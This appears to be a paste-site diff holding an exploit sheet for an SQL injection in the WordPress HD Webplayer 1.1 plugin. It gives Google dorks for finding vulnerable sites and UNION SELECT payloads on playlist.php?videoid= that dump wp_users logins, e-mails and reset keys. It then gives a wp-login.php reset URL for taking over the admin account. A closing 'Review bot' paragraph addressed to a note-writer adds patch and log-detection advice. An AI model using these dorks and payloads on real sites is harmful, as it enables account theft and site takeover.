View difference between Paste ID: 3FwyQ9Qd and 3QmHrKfJ
1
===============================================================================================
2
=                     SQL Injection: WordPress HD Webplayer – Version 1.1                     =
3
=                                                                                             =
4
===============================================================================================
5
                                       METODO 1 "Dork's"
6
=============================================================================================== 
7
#DORK 1 
8
inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=
9
10
#DORK 2
11
HD_Webplayer_Commercial_Key logo.jpg topleft 50 http
12
13
===============================================================================================
14
                                       METODO 2  "Dork's"
15
===============================================================================================
16
# Dork 1 (config.php)
17
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
18
19
# Dork 2 (playlist.php)
20
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
21
22
# Dork 3 (General):
23
inurl:"/wp-content/plugins/hd-webplayer/"
24
===============================================================================================
25
                                               METODO 1  
26
===============================================================================================
27
1 : playlist.php?videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11+from+wp_users
28
===============================================================================================
29
2 : /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users
30
===============================================================================================
31
3 : wp-login.php?action=rp&key=KEY&login=admin
32
===============================================================================================
33
                                               METODO 2
34
===============================================================================================
35
1 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
36
===============================================================================================
37
2 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
38
===============================================================================================
39
3 : wp-login.php?action=rp&key=KEY&login=admin
40
===============================================================================================
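Review bot: The note lists search strings and request patterns but never states the root cause or a fix. Every request in both METODO sections targets the `videoid` parameter of `playlist.php` (the dorks also name `config.php?id=`), which suggests the plugin places these values into a SQL query without validation. A site owner should remove or update the hd-webplayer plugin, and the plugin code should reduce the parameter to an integer with `absint( $_GET['videoid'] )` and build the query with `$wpdb->prepare()`. For detection, web-server logs can be searched for requests under `/wp-content/plugins/hd-webplayer/` whose query string contains `UNION`, `group_concat`, `wp_users` or the `/*!` comment form, especially when followed by hits on `wp-login.php?action=rp`. If such requests are found, treat the `wp_users` logins, e-mail addresses and any pending reset keys as disclosed and invalidate them; recent WordPress releases appear to store `user_activation_key` hashed, which limits step 3, but an old install should not rely on that.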